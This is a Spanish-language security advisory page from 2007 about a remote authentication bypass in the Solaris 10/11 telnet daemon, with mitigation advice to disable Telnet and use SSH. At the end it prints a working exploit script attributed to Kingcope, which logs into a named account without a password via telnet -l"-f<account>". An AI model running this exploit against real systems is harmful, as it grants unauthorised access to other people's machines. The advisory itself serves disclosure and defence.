|
Escrito por Administrator
|
|
lunes, 12 de febrero de 2007 |
|
Página 1 de 2 Se ha reportado una vulnerabilidad en el demonio del servicio Telnet en Sun Solaris, que podría ser explotada por un atacante de forma remota para saltear los controles de autenticación.
Versiones Afectadas Son afectadas por estas vulnerabilidades:
Sun Solaris 10 y Sun Solaris 11
Detalle Debido a una falla en la esterilización de la variable USER por parte del demonio de telnet en Sun Solaris antes de que esta sea referida al programa de "login", es posible que un atacante remoto con conocimiento de un nombre de usuario existente en el equipo, pueda saltear los mecanismos de autenticación y loguearse al equipo, sin necesidad de contraseña. En la configuración por defecto de Solaris no es posible explotar dicha vulnerabilidad para obtener privilegios de root, pero se puede ingresar como otros usuarios.
Impacto El impacto de estas vulnerabilidades es ALTO. Recomendaciones Aún no se encuentra disponible un parche provisto por el fabricante. Se recomienda deshabilitar el servicio Telnet. También es recomendable utilizar el servicio SSH, en vez del Telnet, como servicio para acceso remoto. Exploit! echo "" echo "SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope
Esta dirección de correo electrónico está protegida contra los robots de spam, necesita tener Javascript activado para poder verla
" if [ $# -ne 2 ]; then echo "./sunos <host> <account>" echo "./sunos localhost bin" exit fi echo "" echo "ALEX ALEX" echo "" telnet -l"-f$2" $1 agregar a favoritos (73) | Cite este artículo en su sitio | Views: 5173
|